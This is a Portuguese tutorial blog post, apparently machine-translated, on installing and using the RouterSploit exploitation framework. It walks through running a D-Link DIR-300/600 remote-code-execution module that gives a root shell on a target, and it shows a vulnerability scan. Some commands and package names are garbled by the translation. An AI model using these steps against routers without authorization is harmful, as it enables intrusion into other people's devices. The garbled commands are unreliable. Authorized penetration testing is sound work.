Lar » Ferramentas do Linux » RouterSploit – Tutorial Completo do Exploitation Framework [2020]

RouterSploit – Tutorial Completo do Exploitation Framework [2020]

por O Suyash
routersploit

RouterSploit é uma estrutura de exploração incrível feita especificamente para dispositivos embarcados.

Esta ferramenta pode ser usada pelo pentester para verificar a segurança de câmeras e roteadores.

Destaques do RouterSploit:

  • Codificado em Python.
  • Interface de linha de comando.
  • Suporte Docker.
  • Ferramentas Modulares.

SO compatível:

  1. Mac OS.
  2. Linux.
  3. Telefone Android.
  4. janelas.

Instalando o RouterSploit:

Requisitos:

  • futuro
  • solicitações
  • paramico
  • vertical
  • criptografado

Opcional:

  • azulado – bluetooth de baixa energia

Instalando no Kali Linux:

Siga os comandos abaixo:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Suporte Bluetooth de baixa energia:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalando no Ubuntu:

Siga os comandos abaixo:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Suporte Bluetooth de baixa energia:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalando no MacOS:

Siga os comandos abaixo:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Instalando no Docker:

Siga os comandos abaixo:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Como atualizar o RouterSploit?

Você precisa atualizar o RouterSploit com frequência para evitar transtornos.

Novos módulos são enviados quase todos os dias.

cd routersploit
git pull

Como usar o RouterSploit?

Uso

raiz@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Estrutura de Exploração para    |_|   da Threat9
            Dispositivos incorporados
  
 Codinome   : Eu sabia que você era problema
 Versão    : 3.3.0
 Página inicial   : https://www.threat9.com/ - @threatnine
 Junte-se ao Slack : roteadorsploit.slack.com

 Junte-se ao programa beta do Threat9 - https://www.threat9.com/

 Explorações: 128 Scanners: 4 Créditos: 165 Genérico: 4 Cargas úteis: 32 Codificadores: 6

rsf >

Explorações:

Para pré-formar a exploração, basta escolher o módulo e definir o alvo:

rsf > usar explorações/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & Você-600 Rce) >

Para completar use a tecla tab.

Para exibir opções, tiposhow:

rsf (D-LINK DIR-300 & Você-600 Rce) > mostrar opções

Opções de destino:


   Nome Configurações atuais Descrição                                
   ----       ----------------     -----------                                
   alvo Endereço de destino, por exemplo. http://192.168.1.1     
   porta       80                   Porta alvo

Usarrun ouexploit comando para explorar o alvo:

rsf (D-LINK DIR-300 & Você-600 Rce) > correr
[+] O alvo está vulnerável
[*] Invocando loop de comando...
cmd > uau
raiz

Para definir opções:

rsf (D-LINK DIR-300 & Você-600 Rce) > definir http de destino://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

É possível verificar se o alvo está vulnerável a uma exploração específica:

rsf (D-LINK DIR-300 & Você-600 Rce) > verificar
[+] O alvo está vulnerável

Corrershow info para exibir informações sobre a exploração.

Verificando alvos vulneráveis:

Os scanners permitem verificar rapidamente se o alvo está vulnerável a alguma exploração.

Use os mesmos comandos para exibir/definir opções, e também para correr.

rsf (Scanner D Link) > correr
[+] exploits/dlink/dwr_932_info_disclosure é vulnerável
[-] exploits/dlink/dir_300_320_615_auth_bypass não é vulnerável
[-] exploits/dlink/dsl_2750b_info_disclosure não é vulnerável
[-] exploits/dlink/dns_320l_327l_rce não é vulnerável
[-] exploits/dlink/dir_645_password_disclosure não é vulnerável
[-] exploits/dlink/dir_300_600_615_info_disclosure não é vulnerável
[-] exploits/dlink/dir_300_600_rce não é vulnerável

[+] O dispositivo está vulnerável!
- explorações/dlink/dwr_932_info_disclosure

RouterSploit oficial

Leia também: 1337procuração

Palavras Finais:

RouterSploit é uma ferramenta incrível de usar.

Se você enfrentar qualquer problema relacionado ao RouterSploit. Certifique-se de comentar abaixo. Nossa equipe CSHAWK entrará em contato com você o mais rápido possível.

Deixe um comentário